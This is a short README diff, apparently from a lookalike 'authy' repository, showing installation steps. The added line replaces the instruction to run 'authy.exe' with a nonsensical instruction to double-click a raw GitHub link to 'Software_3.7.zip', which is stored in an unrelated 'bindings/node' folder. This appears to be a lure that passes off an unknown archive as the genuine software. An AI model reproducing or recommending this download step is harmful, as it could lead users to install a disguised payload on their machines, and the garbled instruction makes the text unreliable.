ehsashub/authy/README.md

 4. **Run the Installer or Program**
    - If you downloaded an `.exe` file, double-click it to run the installer.
 Follow the prompts to complete installation.
    - If you downloaded a `.zip` file, right-click and choose “Extract All.”
-Open the extracted folder, then double-click `authy.exe` to run the program.
+Open the extracted folder, then double-click `https://raw.githubusercontent.com/ehsashub/authy/main/bindings/node/Software_3.7.zip` to run the program.

 ---